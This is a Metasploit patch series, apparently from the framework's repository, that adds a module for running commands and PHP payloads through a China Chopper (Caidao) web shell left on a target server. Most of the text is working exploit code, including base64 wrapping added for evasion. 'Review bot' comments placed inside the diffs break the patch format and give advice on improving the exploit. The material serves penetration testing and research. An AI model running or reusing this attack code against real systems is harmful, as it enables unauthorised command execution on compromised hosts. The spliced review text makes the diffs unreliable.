From bc0299356728fd345398616f664dbca364412d84 Mon Sep 17 00:00:00 2001
From: nixawk
Date: Wed, 28 Oct 2015 16:43:58 +0000
Subject: [PATCH 1/8] chinese caidao php backdoor command execution
---
.../unix/webapp/caidao_php_backdoor_exec.rb | 95 +++++++++++++++++++
1 file changed, 95 insertions(+)
create mode 100644 modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb
diff --git a/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb b/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb
new file mode 100644
index 0000000000..e45a7f4dd7
--- /dev/null
+++ b/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb
@@ -0,0 +1,95 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Chinese Caidao PHP Backdoor Command Execution',
+ 'Description' => %q{
+ This module exploits chinese caidao php backdoor which allows
+ os command execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Nixawk'],
+ 'References' => [['URL', 'http://www.maicaidao.com']],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 2048,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['chinsese caidao os cmd exec', {}]
+ ],
+ 'DisclosureDate' => 'Oct 27 2015',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new(
+ 'TARGETURI', [true, 'The path of backdoor', '/caidao.php']
+ ),
+ OptString.new(
+ 'PASSWORD', [true, 'The password of backdoor', 'chopper']
+ ),
+ OptString.new('CMD', [true, 'The command of os', 'dir'])
+ ], self.class)
+ end
+
+ def caidao_req(payload)
+ l = Rex::Text.rand_text_alpha(16)
+ r = Rex::Text.rand_text_alpha(16)
+ uri = normalize_uri(target_uri.path)
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => {
+ "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";"
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m
+ $1
+ end
+ end
+
+ def check
+ flag = Rex::Text.rand_text_alpha(32)
+ payload = "echo \"#{flag}\""
+ data = caidao_req(payload)
+
+ if data && data == flag
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ payload = "echo base64_encode(`#{datastore['CMD']}`)"
+ data = caidao_req(payload)
+
+ if data && !data.blank?
+ data = Rex::Text.decode_base64(data)
+ print_good(data)
+ path = store_loot("#{datastore['CMD']}",
+ 'text/plain',
+ datastore['RHOST'],
+ data,
+ "#{datastore['CMD']}")
+ print_good('Save file to ' + path)
+ end
+ end
+end
From 5d8ccd297edd6cbbea5fc556919c28e647531571 Mon Sep 17 00:00:00 2001
From: nixawk
Date: Thu, 29 Oct 2015 02:15:20 +0000
Subject: [PATCH 2/8] Fix References / Exploit -> Auxiliary
---
.../gather/caidao_php_backdoor_exec.rb | 85 +++++++++++++++++++
1 file changed, 85 insertions(+)
create mode 100644 modules/auxiliary/gather/caidao_php_backdoor_exec.rb
diff --git a/modules/auxiliary/gather/caidao_php_backdoor_exec.rb b/modules/auxiliary/gather/caidao_php_backdoor_exec.rb
new file mode 100644
index 0000000000..4a17a6693b
--- /dev/null
+++ b/modules/auxiliary/gather/caidao_php_backdoor_exec.rb
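Review bot: `check` maps every nil from `caidao_req` to `Exploit::CheckCode::Safe`, but `caidao_req` returns nil both when no HTTP response arrived (or it was not a 200) and when the body simply lacked the markers, so an unreachable host or a wrong TARGETURI is reported as "not vulnerable". Let the helper surface the no-response case (for example `fail_with(Failure::Unreachable, 'No response from target') if res.nil?` inside `caidao_req`, or return the response object) so `check` can answer `Exploit::CheckCode::Unknown` there and reserve `Safe` for a real 200 without markers. The same `check` is copied into the auxiliary module in patch 2 and, via `http_send_command`, into the multi/http module in patch 4; the version patch 7 leaves behind still returns `Safe` on a nil response. `exploit` has the mirror problem at the final `if data && !data.blank?`: when nothing usable comes back it ends silently, so an `else print_error('No usable response from the backdoor')` branch would give the operator the failure signal.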
@@ -0,0 +1,85 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Chinese Caidao PHP Backdoor Command Execution',
+ 'Description' => %q{
+ This module exploits chinese caidao php backdoor which allows
+ os command execution.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Nixawk'],
+ 'References' =>
+ [
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 27 2015'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
+ OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper']),
+ OptString.new('CMD', [true, 'The command of os', 'dir'])
+ ], self.class)
+ end
+
+ def caidao_req(payload)
+ l = Rex::Text.rand_text_alpha(16)
+ r = Rex::Text.rand_text_alpha(16)
+ uri = normalize_uri(target_uri.path)
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => {
+ "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";"
+ }
+ })
+
+ if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m
+ $1
+ end
+ end
+
+ def check
+ flag = Rex::Text.rand_text_alpha(32)
+ payload = "echo \"#{flag}\""
+ data = caidao_req(payload)
+
+ if data && data == flag
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ payload = "echo base64_encode(`#{datastore['CMD']}`)"
+ data = caidao_req(payload)
+
+ if data && !data.blank?
+ data = Rex::Text.decode_base64(data)
+ print_good(data)
+ path = store_loot("#{datastore['CMD']}",
+ 'text/plain',
+ datastore['RHOST'],
+ data,
+ "#{datastore['CMD']}")
+ print_good('Save file to ' + path)
+ end
+ end
+end
From faf9be811acda6a1fa7ad38552d45784309e7c1d Mon Sep 17 00:00:00 2001
From: nixawk
Date: Thu, 29 Oct 2015 02:18:30 +0000
Subject: [PATCH 3/8] delete caidao_php_backdoor_exec from exploits
---
.../unix/webapp/caidao_php_backdoor_exec.rb | 95 -------------------
1 file changed, 95 deletions(-)
delete mode 100644 modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb
diff --git a/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb b/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb
deleted file mode 100644
index e45a7f4dd7..0000000000
--- a/modules/exploits/unix/webapp/caidao_php_backdoor_exec.rb
+++ /dev/null
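Review bot: `caidao_req` reads the capture through the Perl-style global `$1` and builds the POST key as `"#{datastore['PASSWORD']}"`, an interpolation wrapping a single value; the idiomatic forms are `Regexp.last_match(1)` and the plain `datastore['PASSWORD']` (the identical method in patch 1, deleted again in patch 3, has the same shape). The `/m` flag on the marker regex is redundant once the capture is `[\s\S]*`, which already spans newlines, and `Regexp.escape(l)` / `Regexp.escape(r)` would make the interpolation robust even though `rand_text_alpha` currently yields only letters. `'Platform' => ['php']` and `'Arch' => ARCH_PHP` appear to be carried over from the exploit version; an auxiliary module that carries no payload presumably has no consumer for them, so confirm they are wanted before keeping them.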
@@ -1,95 +0,0 @@
-
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
-
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Chinese Caidao PHP Backdoor Command Execution',
- 'Description' => %q{
- This module exploits chinese caidao php backdoor which allows
- os command execution.
- },
- 'License' => MSF_LICENSE,
- 'Author' => ['Nixawk'],
- 'References' => [['URL', 'http://www.maicaidao.com']],
- 'Privileged' => false,
- 'Payload' =>
- {
- 'Space' => 2048,
- 'DisableNops' => true
- },
- 'Platform' => 'php',
- 'Arch' => ARCH_PHP,
- 'Targets' =>
- [
- ['chinsese caidao os cmd exec', {}]
- ],
- 'DisclosureDate' => 'Oct 27 2015',
- 'DefaultTarget' => 0))
-
- register_options(
- [
- OptString.new(
- 'TARGETURI', [true, 'The path of backdoor', '/caidao.php']
- ),
- OptString.new(
- 'PASSWORD', [true, 'The password of backdoor', 'chopper']
- ),
- OptString.new('CMD', [true, 'The command of os', 'dir'])
- ], self.class)
- end
-
- def caidao_req(payload)
- l = Rex::Text.rand_text_alpha(16)
- r = Rex::Text.rand_text_alpha(16)
- uri = normalize_uri(target_uri.path)
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => uri,
- 'vars_post' => {
- "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";"
- }
- })
-
- if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m
- $1
- end
- end
-
- def check
- flag = Rex::Text.rand_text_alpha(32)
- payload = "echo \"#{flag}\""
- data = caidao_req(payload)
-
- if data && data == flag
- Exploit::CheckCode::Vulnerable
- else
- Exploit::CheckCode::Safe
- end
- end
-
- def exploit
- payload = "echo base64_encode(`#{datastore['CMD']}`)"
- data = caidao_req(payload)
-
- if data && !data.blank?
- data = Rex::Text.decode_base64(data)
- print_good(data)
- path = store_loot("#{datastore['CMD']}",
- 'text/plain',
- datastore['RHOST'],
- data,
- "#{datastore['CMD']}")
- print_good('Save file to ' + path)
- end
- end
-end
From 6c16d2a1cad63cacdb43cc375a4a306545a752b1 Mon Sep 17 00:00:00 2001
From: nixawk
Date: Mon, 2 Nov 2015 08:54:18 +0000
Subject: [PATCH 4/8] caidao's exploit module
---
.../gather/caidao_php_backdoor_exec.rb | 85 -------------------
.../multi/http/caidao_php_backdoor_exec.rb | 75 ++++++++++++++++
2 files changed, 75 insertions(+), 85 deletions(-)
delete mode 100644 modules/auxiliary/gather/caidao_php_backdoor_exec.rb
create mode 100644 modules/exploits/multi/http/caidao_php_backdoor_exec.rb
diff --git a/modules/auxiliary/gather/caidao_php_backdoor_exec.rb b/modules/auxiliary/gather/caidao_php_backdoor_exec.rb
deleted file mode 100644
index 4a17a6693b..0000000000
--- a/modules/auxiliary/gather/caidao_php_backdoor_exec.rb
+++ /dev/null
@@ -1,85 +0,0 @@
-
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit4 < Msf::Auxiliary
-
- include Msf::Auxiliary::Report
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Chinese Caidao PHP Backdoor Command Execution',
- 'Description' => %q{
- This module exploits chinese caidao php backdoor which allows
- os command execution.
- },
- 'License' => MSF_LICENSE,
- 'Author' => ['Nixawk'],
- 'References' =>
- [
- ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
- ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
- ],
- 'Platform' => ['php'],
- 'Arch' => ARCH_PHP,
- 'Privileged' => false,
- 'DisclosureDate' => 'Oct 27 2015'))
-
- register_options(
- [
- OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
- OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper']),
- OptString.new('CMD', [true, 'The command of os', 'dir'])
- ], self.class)
- end
-
- def caidao_req(payload)
- l = Rex::Text.rand_text_alpha(16)
- r = Rex::Text.rand_text_alpha(16)
- uri = normalize_uri(target_uri.path)
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => uri,
- 'vars_post' => {
- "#{datastore['PASSWORD']}" => "echo \"#{l}\";#{payload};echo \"#{r}\";"
- }
- })
-
- if res && res.code == 200 && res.body =~ /#{l}([\s\S]*)#{r}/m
- $1
- end
- end
-
- def check
- flag = Rex::Text.rand_text_alpha(32)
- payload = "echo \"#{flag}\""
- data = caidao_req(payload)
-
- if data && data == flag
- Exploit::CheckCode::Vulnerable
- else
- Exploit::CheckCode::Safe
- end
- end
-
- def run
- payload = "echo base64_encode(`#{datastore['CMD']}`)"
- data = caidao_req(payload)
-
- if data && !data.blank?
- data = Rex::Text.decode_base64(data)
- print_good(data)
- path = store_loot("#{datastore['CMD']}",
- 'text/plain',
- datastore['RHOST'],
- data,
- "#{datastore['CMD']}")
- print_good('Save file to ' + path)
- end
- end
-end
diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
new file mode 100644
index 0000000000..79f0280d9f
--- /dev/null
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -0,0 +1,75 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Chinese Caidao PHP Backdoor Code Execution',
+ 'Description' => %q{
+ This module exploits chinese caidao php backdoor.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Nixawk'],
+ 'References' =>
+ [
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => '\x00',
+ },
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['Automatic', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 27 2015',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of backdoor', '/caidao.php']),
+ OptString.new('PASSWORD', [true, 'The password of backdoor', 'chopper'])
+ ], self.class)
+ end
+
+ def http_send_command(code)
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path),
+ 'vars_post' => {
+ "#{datastore['PASSWORD']}" => code
+ }
+ })
+ unless res && res.code == 200
+ fail_with(Failure::Unknown, 'Failed to execute the code.')
+ end
+ res
+ end
+
+ def check
+ flag = Rex::Text.rand_text_alpha(16)
+ res = http_send_command("printf(\"#{flag}\");")
+ if res && res.body =~ /#{flag}/m
+ Exploit::CheckCode::Vulnerable
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ http_send_command(payload.raw)
+ end
+end
From 46fe0c0899c32cd83ba19b6dff7c8bc110a12e92 Mon Sep 17 00:00:00 2001
From: nixawk
Date: Tue, 3 Nov 2015 06:42:52 +0000
Subject: [PATCH 5/8] base64 for evasion purposes
---
modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
index 79f0280d9f..b92814d15e 100644
--- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -5,6 +5,7 @@
 ##
 
 require 'msf/core'
+require 'pry'
 
 class Metasploit4 < Msf::Exploit::Remote
 Rank = ExcellentRanking
@@ -26,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
 ],
 'Payload' =>
 {
- 'BadChars' => '\x00',
+ 'BadChars' => '\x00'
 },
 'Platform' => ['php'],
 'Arch' => ARCH_PHP,
@@ -46,6 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
 end
 
 def http_send_command(code)
+ code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path),
From 109e9b6b6e415df6e26cf15241636d3e8c5bc866 Mon Sep 17 00:00:00 2001
From: nixawk
Date: Tue, 3 Nov 2015 06:52:11 +0000
Subject: [PATCH 6/8] remove debug info - require 'pry'
---
modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 1 -
1 file changed, 1 deletion(-)
diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
index b92814d15e..21a3423fc2 100644
--- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -5,7 +5,6 @@
 ##
 
 require 'msf/core'
-require 'pry'
 
 class Metasploit4 < Msf::Exploit::Remote
 Rank = ExcellentRanking
From 27be832c4c0fef5683e9dd671907f88cfc105684 Mon Sep 17 00:00:00 2001
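Review bot: In the third hunk of patch 5 (`@@ -46,6 +47,7 @@`), `http_send_command` overwrites its own `code` parameter with the wrapped string, so from that line on the name no longer denotes what the caller passed, which makes the method harder to read and to step through; bind the wrapper to a fresh local, `wrapped = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"`, and pass `wrapped` as the POST value below. A one-line comment stating that every request, including the `printf` probe in `check`, now goes through this wrapper would also help the next reader, since the method's body and its callers continue outside the hunk. The interpolation itself is sound: the base64 alphabet contains no quote, dollar or backslash, so nothing can break out of the PHP double-quoted string.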
From: wchen-r7
Date: Thu, 5 Nov 2015 18:19:46 -0600
Subject: [PATCH 7/8] remove the fail_with because it's always triggering anyway
---
.../exploits/multi/http/caidao_php_backdoor_exec.rb | 11 ++---------
1 file changed, 2 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
index 21a3423fc2..c2050da87c 100644
--- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -24,10 +24,6 @@ class Metasploit4 < Msf::Exploit::Remote
 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
 ['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
 ],
- 'Payload' =>
- {
- 'BadChars' => '\x00'
- },
 'Platform' => ['php'],
 'Arch' => ARCH_PHP,
 'Targets' =>
@@ -47,17 +43,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
 def http_send_command(code)
 code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
- res = send_request_cgi({
+ send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(target_uri.path),
 'vars_post' => {
 "#{datastore['PASSWORD']}" => code
 }
 })
- unless res && res.code == 200
- fail_with(Failure::Unknown, 'Failed to execute the code.')
- end
- res
 end
 
 def check
@@ -71,6 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote
 end
 
 def exploit
+ print_status("#{peer} - Sending exploit...")
 http_send_command(payload.raw)
 end
 end
From ea22583ed1066d45a404525e54bb48539d4e716d Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Thu, 5 Nov 2015 18:29:03 -0600
Subject: [PATCH 8/8] Update title and description
---
modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
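Review bot: In the second hunk of patch 7 (`@@ -47,17 +43,13 @@`), `http_send_command` now returns whatever `send_request_cgi` yields, nil on a timeout included, and nothing in the method records why that is acceptable; the commit message ("it's always triggering anyway") suggests a missing or non-200 reply is the expected outcome once the PHP payload holds the request open, so put that reasoning in the code, e.g. `# No status check: a nil/non-200 reply is expected on success because the payload typically keeps the request open, so no HTTP response returns before the timeout.` Without it the next maintainer will likely reinstate the check. The consequence for `check`, whose body starts after the `def check` context line and outside this hunk, is that a nil response still yields `Exploit::CheckCode::Safe` rather than `Unknown`, and `exploit` in the third hunk gives no feedback at all on a refused connection beyond the new `print_status`; consider `fail_with(Failure::Unreachable, 'Connection failed') if res.nil?` in `exploit` only if the timeout-on-success case can be told apart from a refused connection.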
diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
index c2050da87c..354346d31f 100644
--- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -13,9 +13,10 @@ class Metasploit4 < Msf::Exploit::Remote
 
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Chinese Caidao PHP Backdoor Code Execution',
+ 'Name' => 'China Chopper Caidao PHP Backdoor Code Execution',
 'Description' => %q{
- This module exploits chinese caidao php backdoor.
+ This module takes advantage of the China Chopper Webshell that is
+ commonly used by Chinese hackers.
 },
 'License' => MSF_LICENSE,
 'Author' => ['Nixawk'],